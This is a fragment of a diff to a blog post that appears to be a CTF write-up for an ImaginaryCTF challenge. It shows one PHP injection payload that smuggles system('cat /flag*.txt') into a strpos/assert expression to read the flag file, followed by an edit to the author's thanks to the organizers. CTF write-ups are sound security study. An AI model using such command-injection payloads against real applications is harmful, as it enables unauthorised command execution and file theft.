ammarbinfaisal/blog/_posts/2024-07-23-journal-imaginary-ctf.md

 strpos('', '1') or die(system('cat /flag*.txt'))or strpos('e', '..') === false
 ```

-**Thanks to the organizers for the challenge I really enjoyed the ctf, especially this challenges.**
+**Thanks to the organizers.
+I really enjoyed the ctf, especially this challenge.**